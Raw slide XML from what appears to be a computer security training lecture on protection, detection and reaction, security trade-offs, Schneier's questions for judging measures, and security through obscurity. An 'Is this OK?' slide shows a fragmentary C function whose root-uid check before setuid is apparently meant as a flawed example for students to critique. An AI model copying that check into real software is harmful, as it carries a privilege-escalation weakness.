              <a:t>Protection, detection, reaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Know your enemy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: types of attacks, typical tricks, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>commonly exploited vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Attackers don’t create security holes and vulnerabilities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>they exploit existing ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Software security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Two main sources of software security holes: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>architectural flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>implementation bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Think about security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>in all phases </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>of software development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Follow standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>software development procedures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alarm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788" y="2708275"/>
            <a:ext cx="2003425" cy="142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Protection, detection, reaction</a:t>
            </a:r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90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>An ounce of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prevention </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>is worth a pound of cure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-271463" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>better to protect that to recover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>is necessary </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>because total prevention </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>is impossible to achieve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="90488" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Without some kind of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>detection is useless </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="541338" lvl="1" indent="-271463" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>like a burglar alarm </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>that no-one listens and responds to</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24581" name="Picture 5" descr="padlock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5275" y="1125538"/>
            <a:ext cx="1209675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2" name="Picture 6" descr="police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0938" y="4552950"/>
            <a:ext cx="2281237" cy="170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Protection, detection, reaction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113000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="113000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Each and every of the three elements is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>very important</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="113000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security solutions focus too often on prevention only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="113000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(Network/Host) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intrusion Detection Systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>tools for detecting network and system level attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="113000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>For some threats, detection (and therefore reaction) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>is not possible, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strong protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> is crucial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="113000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>example: eavesdropping on Internet transmission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Is this OK?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250825" y="1031875"/>
            <a:ext cx="8713788" cy="5183188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1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GB" sz="2000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GB" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set_non_root_uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1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GB" sz="2000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unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1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GB" sz="2000" b="1" dirty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GB" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty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>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty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>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" i="1" dirty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GB" sz="2000" b="1" i="1" dirty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// making sure that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" i="1" dirty="0" err="1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uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" i="1" dirty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is not 0 == root </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty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GB" sz="20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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1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GB" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == 0) {  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" i="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty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n-GB" sz="20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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty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GB" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1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GB" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty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>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty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GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty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22021412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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\Presentations\materials\epic-fail-door-fai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4150" y="1052513"/>
            <a:ext cx="6980238" cy="5237162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6" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="502149">
            <a:off x="5368925" y="1322388"/>
            <a:ext cx="3621088" cy="1325562"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933"/>
          </a:solidFill>
          <a:ln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en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incomplete protection measures that become “temporary” forever</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26629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Things to avoid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How much security?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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Total</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> security is unachievable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trade-off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: more security often means</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>higher cost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>less convenience / productivity / functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security measures should be as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>invisible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>cannot irritate users or slow down the software (too much) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>example: forcing a password change everyday </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>users will find a workaround, or just stop using it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Choose security level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>relevant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to your needs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22532" name="Picture 4" descr="MCj0290811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1063" y="1946275"/>
            <a:ext cx="1589087" cy="126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Is a particular security measure good?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3000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>(Questions proposed by Bruce Schneier)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What problem does it solve?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>whether it really solves the problem you have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How well does it solve the problem?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>will it work as expected?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What new problems does it add?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>it adds some for sure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What are the economic and social costs? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>cost of implementation, lost functionality or productivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Given the above, is it worth the costs?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="203000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>More at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.schneier.com/crypto-gram-0204.html#1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Security measures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1908175" y="1196975"/>
            <a:ext cx="5113338" cy="4608513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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28676" name="Picture 6" descr="sandal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2638" y="1412875"/>
            <a:ext cx="4781550" cy="369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Security through obscurity … ?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300" i="1" smtClean="0"/>
              <a:t>Security through obscurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> – hiding design </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>or implementation details to gain security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>keeping secret not the key, but the encryption algorithm,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>hiding a DB server under a name different from “db”, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>The idea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doesn’t work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>it’s difficult to keep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secrets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>(e.g. source code gets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stolen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
